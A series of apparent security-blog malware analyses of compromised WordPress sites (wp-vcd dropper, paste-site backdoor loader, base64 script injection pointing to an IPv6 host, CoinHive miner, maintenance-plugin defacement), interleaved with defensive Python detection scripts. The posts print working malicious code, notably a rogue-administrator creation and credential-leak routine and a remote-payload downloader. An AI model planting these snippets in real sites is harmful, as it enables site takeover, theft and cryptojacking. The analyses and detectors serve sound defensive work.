Using Google and Facebook to aid on distribution

Every now and then I check my spam mailbox for interesting malware (yes, I receive a lot of phishing messages and alerts that my payments are overdue), but most of the time it's more of the same: effortless malware and poorly written messages that are not fun to analyze.


Today I was bored (that time of the year when you need to write tons of reports, sorry boss…) and I decided to follow the trail of some of the links in the messages I got. The first one was a "pleasant" surprise.

Usually I'd go with checking the message origin and writing about how it was sent and what was used to get control of the site, but this time I'll write about another aspect. (If you are wondering, it is a WordPress site with a vulnerable revslider in the site's theme that allowed the attacker to gain privileged access to the site.)

For those not fluent in Brazilian Portuguese, this message is telling me that I have a payment overdue and that a new "boleto" (a common barcode payment method in Brazil) is attached. The interesting part is that they refer to me by my personal email alias and not my full name; however, they got my CPF (Brazil's equivalent of a Social Security Number) correct, which is probably related to some leaked data (not that uncommon here).

Everything in this message is clickable and all of the links send you to the same Google shortened URL, which resolves to Facebook's fbsbx.com domain, the domain Facebook uses to store attachments shared in chats and groups.

It is pretty interesting that they rely on such services to "host" their files instead of using another hacked site to store the malware. I monitored this file and, although the link was set to expire on Fri, 22 Dec 2017 16:15:47 GMT, it was taken down less than 24h after I received the scam email, probably by a Facebook malware scanning process.

WP-VCD Malware Comes with Nulled Themes

Recently we wrote about wp-vcd malware that created rogue WordPress admin users (100010010) and injected spam links.

Our readers noticed that the “nulled” premium theme sites promoted by the injected links (and some other similar sites) had this very wp-vcd malware pre-installed with every downloaded theme.

It's pretty easy to notice when you check the files inside the downloaded .zip files: all original files have one date, but two files have a different, more recent date:


12914 Dec  4 09:25 functions.php
33045 Nov 30 09:33 class.theme-modules.php

And if you check those files, you'll notice that functions.php has this line of code at the top:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

And class.theme-modules.php (the file included by the code added to functions.php) is the file that installs the wp-vcd malware into the theme and creates the rest of the malicious files.

The beginning of the file looks like this:

<?php
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...long base64-encoded string here followed by installation code......
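A defender-side check for exactly the two tells described above, written for this page as an added example rather than code from the original post: it opens a theme archive, reports members whose date differs from the majority, and greps PHP members for the class.theme-modules.php loader line. The archive contents, dates and file names are constructed to mirror the listing above; the only identifiers taken from the post are functions.php and class.theme-modules.php.

```python
import io
import re
import zipfile
from collections import Counter
from typing import Dict, List

# Loader line the post shows at the top of the tampered functions.php:
# include_once of class.theme-modules.php located next to the file.
INCLUDE_RE = re.compile(
    r"include_once\s*\(\s*dirname\s*\(\s*__FILE__\s*\)\s*\.\s*'/class\.theme-modules\.php'"
)


def build_sample_theme_zip() -> bytes:
    """Constructed theme archive (not a real theme): most members carry the
    release date, while the two files named in the post carry later dates."""
    release = (2017, 6, 1, 12, 0, 0)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        def add(name: str, body: str, date_time) -> None:
            zf.writestr(zipfile.ZipInfo(name, date_time=date_time), body)

        add("theme/style.css", "/* Theme Name: Sample */\n", release)
        add("theme/index.php", "<?php get_header(); ?>\n", release)
        add("theme/header.php", "<!DOCTYPE html>\n", release)
        add("theme/functions.php",
            "<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) "
            "include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>\n"
            "<?php // legitimate theme setup would follow here\n",
            (2017, 12, 4, 9, 25, 0))
        add("theme/class.theme-modules.php",
            "<?php //install_code1\nerror_reporting(0);\n",  # truncated stand-in, not the dropper
            (2017, 11, 30, 9, 33, 0))
    return buf.getvalue()


def date_outliers(zip_bytes: bytes) -> List[str]:
    """Members whose calendar date differs from the most common date in the archive."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        files = [i for i in zf.infolist() if not i.is_dir()]
        common_date = Counter(i.date_time[:3] for i in files).most_common(1)[0][0]
        return sorted(i.filename for i in files if i.date_time[:3] != common_date)


def loader_includes(zip_bytes: bytes) -> List[str]:
    """PHP members that contain the class.theme-modules.php loader line."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return sorted(
            i.filename for i in zf.infolist()
            if i.filename.endswith(".php")
            and INCLUDE_RE.search(zf.read(i).decode("utf-8", errors="replace"))
        )


def review_theme_zip(zip_bytes: bytes) -> Dict[str, object]:
    """Run both checks; the archive is flagged when either one fires."""
    outliers = date_outliers(zip_bytes)
    includes = loader_includes(zip_bytes)
    return {"date_outliers": outliers, "loader_includes": includes,
            "flagged": bool(outliers or includes)}


if __name__ == "__main__":
    print(review_theme_zip(build_sample_theme_zip()))
```

The date check is only a heuristic (a legitimate theme update can touch one file too), which is why the loader grep is run alongside it; a hit on the include line is the stronger signal.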

Providing “nulled” content with backdoors, spam and other types of malware is typical for sites that offer premium software “for free”. We warned against using nulled themes and plugins many times.

Cleaning sites with such malware may not be that easy, as it downloads and installs more malware as soon as you begin using the contaminated theme or plugin. And the backdoor it creates allows the bad guys to do almost anything with your site. That's why a thorough site analysis and cleanup is required. Let us know if you need our help.

Backdoor using paste site to host payload

Over the last months, we've been talking a lot about new ways to decode complex malware that involves the usual PHP functions like eval, create_function, preg_replace, assert, base64_decode, etc.


According to our latest reports, "Backdoors are found in 72% of infected websites". Although we have hundreds of posts on backdoors and their effects, today I want to discuss a few techniques that don't follow any obfuscation tricks like encrypted strings, concatenations, and typecasting. These unusual backdoors often look like legitimate code and can go unnoticed by most of the malware scanners available on the market.

During an incident response investigation, I detected an interesting backdoor that was small, simple and effective.

The backdoor content was uploaded to the wp-content/themes/buildup/db.php file and looked like this:

<?php
if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
    echo "Copy_success";
} else {
    echo "Copy_failed";
}
?>

This small piece of code downloads the full malware from the hxxps://paste[.]ee website (if you are not familiar with this site, it's like Pastebin with SSL and fewer controls).

The downloaded code was obfuscated with a free tool, which is pretty common for malware developers, but we see good code using it too (note to devs: avoid using those free tools, they may be saving your code).

And here's the more "readable" code:

And, as you may see, we got ourselves a nice copy of the FilesMan backdoor being downloaded by a file that may be overlooked by an untrained person.

In order to prevent the website from getting infected, we highly recommend implementing security measures like file integrity monitoring and a web application firewall. It is advisable to constantly monitor your logs for unexpected behavior.
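The file integrity monitoring the paragraph recommends, reduced to its core, as an added example (not the post's or any product's code): hash every file under the web root into a baseline, re-hash later and report what appeared or changed. The directory layout, the theme name buildup and the db.php file follow the post; the dropper's paste URL is replaced by a placeholder and the whole scenario is constructed.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path) -> str:
    """Stream the file so large uploads do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map every file below root (POSIX-style relative path) to its SHA-256."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare_baseline(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files that appeared, disappeared or changed since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: snapshot a clean theme, then a dropper file appears
    and functions.php is edited to include it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "buildup"
        theme.mkdir(parents=True)
        (theme / "functions.php").write_text("<?php // theme setup\n")
        (theme / "style.css").write_text("/* Theme Name: buildup */\n")
        baseline = build_baseline(root)

        # Post-compromise state. The URL is a placeholder, not the one from the post.
        (theme / "db.php").write_text(
            "<?php\nif ( @copy('hxxps://paste-site.invalid/r/PLACEHOLDER/0', 'db.php') ) {\n"
            "    echo \"Copy_success\";\n} else {\n    echo \"Copy_failed\";\n}\n?>\n"
        )
        (theme / "functions.php").write_text("<?php // theme setup\ninclude 'db.php';\n")
        return compare_baseline(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

In production the baseline would be written to storage the web server cannot modify (or signed), and the comparison run on a schedule; a new PHP file in a theme directory, as here, deserves a look regardless of how innocuous its name is.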

IPv6 address in malicious Javascript redirect

We recently came across a file that shows an interesting case of a malicious JavaScript code injection in a website's custom script file, though it's not specific to any particular website software:


Infected filename: ./paginas/rodape.php

As this is just a malicious code injection, the filename can be just about anything with a legitimate file extension (e.g. .php, .html, .htm, etc.) on most web server configurations. The injection was simply appended to the bottom of the file's text, inside the normal HTML JavaScript tags (<script></script>):

<script src='data:application/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoIiUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCUzYSUyZiUyZiU1YiUzYSUzYSU2NiU2NiU2NiU2NiUzYSUzMSUzMiU2NCU2MyUzYSU2MSUzNyUzMiUzMiU1ZCUyZiUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSIpKTs='>
</script>

This injection may not look that suspicious if not checked carefully, as there are legitimate uses of base64 encoded data within JavaScript applications. However, the base64 is quickly decoded using the base64_decode function in PHP, the base64 -d command on Linux (Debian based) or, the fastest way, one of the myriad online decoder websites. Below is the result of decoding the base64 text from the above malicious code:

document.write(unescape("%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%5b%3a%3a%66%66%66%66%3a%31%32%64%63%3a%61%37%32%32%5d%2f%22%3e%3c%2f%73%63%72%69%70%74%3e"));

The base64 decoded text reveals another layer of text that is de-obfuscated through the unescape function, but it also reveals something that is suspicious: document.write(

The JavaScript function document.write is often seen in malicious JavaScript code injections, as it causes whatever is within the function's parentheses to be written to the visitor's browser page.

Now that we know that this code is trying to write something to the visitor's browser, let's decode the URL encoded text that follows unescape(:

<script src="http://[::ffff:12dc:a722]/"></script>

This reveals the true nature of this obfuscated JavaScript injection: the code uses the document.write function to force the visitor's browser to load an external JavaScript file, which in this case happens to be hosted on an IPv6 address. The result for the unsuspecting visitor is being redirected to the above IPv6 address, which hosts a website with Adobe Flash images instructing the visitor to update their Adobe Flash through a popup dialog box:
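The three decoding steps walked through above, automated as an added example that is not part of the original post. It takes the src value of the injected script tag quoted above, decodes the data: URI, expands the unescape() argument, pulls out the script URL it writes and classifies the host. It goes one step beyond the text by noting that ::ffff:12dc:a722 is an IPv4-mapped IPv6 address and reporting the embedded IPv4 (the standard ipaddress module does the conversion). Everything else, including the function names, is this example's own.

```python
import base64
import ipaddress
import re
from typing import Dict, Optional, Tuple
from urllib.parse import unquote, urlsplit

# The src attribute of the injected <script> tag quoted in the post.
INJECTED_SRC = (
    "data:application/javascript;base64,"
    "ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoIiUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCUzYSUyZiUyZiU1YiUzYSUzYSU2NiU2NiU2NiU2NiUzYSUzMSUzMiU2NCU2MyUzYSU2MSUzNyUzMiUzMiU1ZCUyZiUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSIpKTs="
)

DATA_URI_RE = re.compile(r"^data:([^;,]*)(;base64)?,(.*)$", re.S)
UNESCAPE_RE = re.compile(r"unescape\(\s*([\"'])(.*?)\1\s*\)", re.S)
SRC_RE = re.compile(r"src\s*=\s*[\"']([^\"']+)[\"']", re.I)


def decode_data_uri(src: str) -> str:
    """Return the script body carried by a data: URI (base64 or percent-encoded)."""
    m = DATA_URI_RE.match(src.strip())
    if not m:
        raise ValueError("not a data: URI")
    body = m.group(3)
    return base64.b64decode(body).decode("utf-8") if m.group(2) else unquote(body)


def js_unescape(s: str) -> str:
    """Approximation of JavaScript's unescape(): expands %uXXXX and %XX sequences."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def classify_host(host: str) -> Tuple[str, Optional[str]]:
    """Tell a hostname from an IP literal; for IPv4-mapped IPv6 also give the IPv4."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "name", None
    if ip.version == 6:
        mapped = ip.ipv4_mapped
        return "ipv6-literal", (str(mapped) if mapped else None)
    return "ipv4-literal", None


def peel(src: str) -> Dict[str, object]:
    """Walk the layers: data URI -> unescape() argument -> injected <script src>."""
    layer1 = decode_data_uri(src)
    m = UNESCAPE_RE.search(layer1)
    layer2 = js_unescape(m.group(2)) if m else layer1
    srcs = SRC_RE.findall(layer2)
    loaded = srcs[0] if srcs else None
    host = urlsplit(loaded).hostname if loaded else None  # hostname strips the [] brackets
    kind, mapped = classify_host(host) if host else ("none", None)
    return {
        "uses_document_write": "document.write(" in layer1,
        "loaded_src": loaded,
        "host": host,
        "host_kind": kind,
        "ipv4_mapped": mapped,
    }


if __name__ == "__main__":
    for key, value in peel(INJECTED_SRC).items():
        print(f"{key}: {value}")
```

Nothing here contacts the host; the script only decodes text that is already in the infected file, which is the safe way to triage such an injection before deciding whether to block the address at the firewall or search other files for the same pattern.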

If the visitor clicks anywhere on the page itself, they are automatically redirected, again using JavaScript hosted on the IPv6 address, to a hosted file that presumably contains malware. I was unable to confirm the file as it had been taken down at the time of testing, but it is quite easy for the malware distributor to just switch to a different host for the malicious file that is downloaded to the visitor's computer.

This is interesting because, while IPv6 addresses have been in use for some time now, they still aren't used very often for hosting an entirely malicious website and sending unsuspecting users there through malicious JavaScript injected into compromised websites. We still primarily see domain names or the better known IPv4 addresses, which is what most people picture when they think of an IP address. Now might be a good time to learn a little more about IPv6, just so that you can recognize it and know that it operates similarly to IPv4 in that it can be used in a URL.

If you are ever worried that a similar malicious Javascript injection may be on your website, then please try out our completely free, no account required website scanner: SiteCheck.

Fake jQuery and Google Analytics Hide Yet Another...

This is a quick post about yet another quite massive attack that installs CoinHive JavaScript Monero miners on compromised websites. You might have already read our blog posts on how such attacks were first detected and how they escalated after that.

On Oct 30th, 2017 Microsoft Malware Protection Services tweeted about a new cryptocurrency miner on compromised sites.


The malicious code has a few interesting features that help obfuscate its true nature:

1. use of non-dotted decimal notation for the host name: 3104709642 (which translates to 185 .14 .28 .10)

2. quite a common trick of using the jQuery name as a script name: hxxp://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 (the script actually loads an obfuscated version of the CoinHive library)

3. use of Google Analytics related variable names (google_analytics, googleanalytics) instead of the suspicious miner, to make it look even more legit.
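The first two tricks in the list, as an added example (not code from the post): convert an integer hostname to dotted notation the way a browser would, and flag script paths that borrow a library name. The first sample URL is the one quoted above, still defanged; the other two samples and all function names are constructed for this example, and the hex form generalizes beyond the decimal case the post shows.

```python
import ipaddress
import re
from typing import Dict, Optional
from urllib.parse import urlsplit

# First entry is the script URL from the post (kept defanged with "hxxp");
# the other two are constructed: a benign control and the same address written in hex.
SAMPLES = [
    "hxxp://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11",
    "https://code.jquery.com/jquery-3.2.1.min.js",
    "hxxp://0xb90e1c0a/lib/jquery.min.js",
]

# Script names that borrow the identity of well-known libraries or analytics tags.
LOOKALIKE_RE = re.compile(r"/(jquery|google[-_]?analytics|analytics)[^/]*\.js$", re.I)


def refang(url: str) -> str:
    """Turn the hxxp defanging back into a parseable scheme (no request is made)."""
    return re.sub(r"^hxxp", "http", url, flags=re.I)


def host_as_ipv4(host: str) -> Optional[str]:
    """Interpret an integer hostname (decimal or 0x-hex) as an IPv4 address.

    Browsers accept "http://3104709642/" and treat the number as a 32-bit
    address, which is what the injected script relies on. Classic octal with a
    leading zero is rejected by int(..., 0) and so is reported as not numeric.
    """
    try:
        n = int(host, 0)
    except ValueError:
        return None
    if not 0 <= n <= 0xFFFFFFFF:
        return None
    return str(ipaddress.IPv4Address(n))


def assess(url: str) -> Dict[str, object]:
    """Flag a script URL whose host is an integer and whose name imitates a known library."""
    parts = urlsplit(refang(url))
    host = parts.hostname or ""
    numeric = host_as_ipv4(host)
    lookalike = bool(LOOKALIKE_RE.search(parts.path))
    return {"url": url, "host": host, "numeric_host": numeric,
            "lookalike_library": lookalike,
            "suspicious": numeric is not None and lookalike}


if __name__ == "__main__":
    for sample in SAMPLES:
        print(assess(sample))
```

The benign control also matches the library-name pattern, which is the point: a jQuery file name is only a signal when combined with a host that is a bare number or otherwise not a known CDN, so the two checks are combined rather than used alone.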

If you remove the layers of obfuscation, it's still a typical CoinHive mining script that uses the NPRak9QU4lFBSneFt23qEIChh5r0SZev site id for the miner.

We decided to search for compromised sites with this script, but it turned out that the screenshot provided by Microsoft was not the version of the script injected into websites; it was an already decoded version of the malicious script. The original code looks like this:

eval(function(p,a,c,k,e,r){e=function(c)...skipped...document|google_analytics|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics|Anonymous||NPRak9QU4lFBSneFt23qEIChh5r0SZev|start|http|window|js'.split('|'),0,{}))

A quick search on PublicWWW revealed 1833 infected websites (as of Nov 22, 2017). We checked quite a few of them - they were all WordPress sites. Moreover, all the infected sites also shared the "cloudflare.solutions" malware (now it loads a keylogger script) that we wrote about this April.

This is a typical WordPress infection and you can use our guide to clean it or have us do it for you.

New wave of wp-vcd Malware

Recently we saw a new wave of a known malware that injects malicious WordPress admin users into vulnerable or compromised sites.


The malware, well analysed by Manuel D'Orso (here), was being injected into default WordPress themes that are not used by the infected site (twentyfifteen and twentysixteen mostly).

Back when we first detected this wp-vcd variant, it was injecting its code into "wp-includes/class.wp.php". This is an outdated strategy to avoid being detected by the unaware user, since nobody wants to delete WordPress core files and risk the site's integrity. However, as security tools become more and more popular, this strategy fails: it's now pretty easy for any tool to detect modifications to core files. And since theme files change constantly, they found a better place to hide it.

The injection, in most of the cases we found, was related to outdated software (plugins or themes), which a simple update or using a WAF would prevent. Update: this malware is also pre-installed in "nulled" premium themes on certain download sites.

The code is pretty straightforward and doesn't hide its malicious intentions by encoding or obfuscating functions...

<?php
error_reporting(0);
if( !isset($_GET['go']) ){
    require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
    $table_name = $wpdb->get_blog_prefix();
    $sample = 'a:1:{s:13:"administrator";b:1;}';
    if( isset($_GET['ok']) ) {
        echo '<!-- Silence is golden. -->';
    }
    // ?awu : add the rogue administrator user
    if( isset($_GET['awu']) ) {
        $wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`,  `user_status`, `display_name`) VALUES ('100010010', '100010010', '$P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.',   '100010010', 'te@ea.st', '', '2011/06/07 0:00 00:00:00', '', '0', '100010010');");
        $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");
        $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '100010010', '{$table_name}user_level', '10');");
    }
    // ?dwu : delete the rogue user again
    if( isset($_GET['dwu']) ) {
        $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 100010010");
        $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010");
    }
    // ?key : leak the Envato Market plugin credentials stored in the options table
    if( isset($_GET['key']) ) {
        $options = get_option( EWPT_PLUGIN_SLUG );
        echo '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';
        echo esc_html( envato_market()->get_option( 'token' ) );
        echo '</center></h2>';
    }
}

It creates a new admin user named 100010010 which, as an admin, can perform several malicious activities on the infected site.

If you found this code on your site and need help checking for any other possible malware, please contact us; we'll be glad to help.

Attackers leveraging WP Maintenance plugin to deface websites

Recently, during a website investigation, we detected that attackers have been modifying the settings that the WP Maintenance plugin (a very popular WordPress plugin that adds a "down for maintenance" or "coming soon" page to your website) stores in the database, inserting malicious content into the wpmm_settings option to lead users to harmful content.

The malware changes the plugin's database values to the defacement page as follows:

The background:

"bg_custom";s:67:"https://www.website.com/wp-content/uploads/2017/07/anonymous.jpg";

And the message:

s:4:"text";
s:538:"<h2 class="pi-item pi-item-spacing pi-title">“When you’re stuck in a foreign country and don’t know the words for “reverse charges”
and you’re in some lonely skin joint in the middle of some poor slum and just had every last cent robbed from you and you call yourself a bodyguard then you know you’re a loser.\"</h2>
<p style="text-align: left"> </p>

Now, in order to "deface" the website, the attacker only needs to enable the maintenance page. No files were rewritten, and inexperienced website owners may have some trouble figuring out what happened and how to fix it.

It is worth mentioning that the plugin is NOT vulnerable; the attackers were leveraging valid plugin functions instead of replacing the index.php file as usual.
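Both the rogue-admin dropper above (the capabilities string a:1:{s:13:"administrator";b:1;} it writes to usermeta) and the modified wpmm_settings option in this section store PHP-serialized arrays, so one added example serves both; it is not code from either post. A small PHP unserialize reader is used to (a) list users granted administrator that are not on an allowlist and (b) report which keys of a serialized option changed against a stored baseline, which catches a defacement that touched only the database. The usermeta rows, the wpmm_settings values, the example.invalid URL and all function names are constructed; user ID 100010010 is the one the dropper inserts.

```python
from typing import Any, Dict, Iterable, List, Tuple


class PhpUnserializer:
    """Minimal reader for PHP serialize() output: N, b, i, d, s and a (arrays).
    Works on bytes because s:LEN counts bytes, not characters."""

    def __init__(self, data: bytes) -> None:
        self.data = data
        self.pos = 0

    def _expect(self, token: bytes) -> None:
        if not self.data.startswith(token, self.pos):
            raise ValueError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def _read_until(self, sep: bytes) -> bytes:
        end = self.data.index(sep, self.pos)
        chunk = self.data[self.pos:end]
        self.pos = end + len(sep)
        return chunk

    def value(self) -> Any:
        tag = self.data[self.pos:self.pos + 1]
        if tag == b"N":
            self._expect(b"N;")
            return None
        self._expect(tag + b":")
        if tag == b"b":
            return self._read_until(b";") == b"1"
        if tag == b"i":
            return int(self._read_until(b";"))
        if tag == b"d":
            return float(self._read_until(b";"))
        if tag == b"s":
            length = int(self._read_until(b":"))
            self._expect(b'"')
            raw = self.data[self.pos:self.pos + length]
            self.pos += length
            self._expect(b'";')
            return raw.decode("utf-8", errors="replace")
        if tag == b"a":
            count = int(self._read_until(b":"))
            self._expect(b"{")
            items: Dict[Any, Any] = {}
            for _ in range(count):
                key = self.value()
                items[key] = self.value()
            self._expect(b"}")
            return items
        raise ValueError(f"unsupported tag {tag!r} at offset {self.pos}")


def php_unserialize(text: str) -> Any:
    return PhpUnserializer(text.encode("utf-8")).value()


def grants_administrator(serialized_caps: str) -> bool:
    """True when a *_capabilities value contains administrator => true."""
    caps = php_unserialize(serialized_caps)
    return isinstance(caps, dict) and caps.get("administrator") is True


def unexpected_admins(usermeta_rows: Iterable[Tuple[int, str, str]],
                      known_admin_ids: set) -> List[int]:
    """From (user_id, meta_key, meta_value) rows, return admin user ids not on the allowlist."""
    return sorted(
        user_id for user_id, meta_key, meta_value in usermeta_rows
        if meta_key.endswith("capabilities")
        and grants_administrator(meta_value)
        and user_id not in known_admin_ids
    )


def changed_option_keys(baseline_serialized: str, current_serialized: str) -> List[str]:
    """Keys of a serialized option array whose value differs from a stored baseline."""
    old, new = php_unserialize(baseline_serialized), php_unserialize(current_serialized)
    return sorted(k for k in set(old) | set(new) if old.get(k) != new.get(k))


# Constructed rows: ID 1 is the site's real admin, 100010010 is the user the dropper inserts.
USERMETA_ROWS = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (5, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    (100010010, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]

# Constructed wpmm_settings-style values, reduced to the two keys the post discusses.
WPMM_BASELINE = 'a:2:{s:9:"bg_custom";s:0:"";s:4:"text";s:21:"Back soon, thank you!";}'
WPMM_DEFACED = ('a:2:{s:9:"bg_custom";s:56:"https://example.invalid/wp-content/uploads/anonymous.jpg";'
                's:4:"text";s:16:"<h2>defaced</h2>";}')


if __name__ == "__main__":
    print("rogue admins:", unexpected_admins(USERMETA_ROWS, {1}))
    print("changed wpmm keys:", changed_option_keys(WPMM_BASELINE, WPMM_DEFACED))
```

The rows and option values would normally come from a SELECT on wp_usermeta and wp_options (or from a database dump); the point of parsing the serialized form rather than substring-matching it is that the same reader works for every plugin option, so the baseline comparison extends to any setting an attacker might repurpose.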

The rendered code will result in something like this:

As website owners, we have to make sure our visitors have the best experience possible and won't be at risk when accessing our website.

If you detected any unusual code or suspect any unexpected behavior, we are here to help you get your website back on track.